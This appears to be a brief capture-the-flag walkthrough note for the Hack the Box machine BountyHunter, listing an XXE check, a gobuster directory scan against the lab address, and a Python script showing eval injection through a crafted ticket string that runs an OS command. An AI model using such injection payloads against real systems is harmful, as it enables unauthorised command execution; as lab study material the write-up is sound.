Hack the Box : BountyHunter

XML external entity injection again (NodeBlog).

eval exploit is fun.

YouTube

作成した動画を友だち、家族、世界中の人たちと共有

www.youtube.com

01:12 Check for XXE vulnerability 

XEE_Payload

01:39 gobuster for .php file

gobuster dir --url http://10.10.11.100 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php

02:46 eval injection check

Hacking Python Applications

And how attackers exploit common programming pitfalls to gain control

medium.com

cat sample.py

x="**18+701+8+__import__('os').system('id')**"
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
    validationNumber = eval(x.replace("**", ""))
    print(validationNumber)
    if validationNumber > 100:
        print("True")
    else:
        print("False")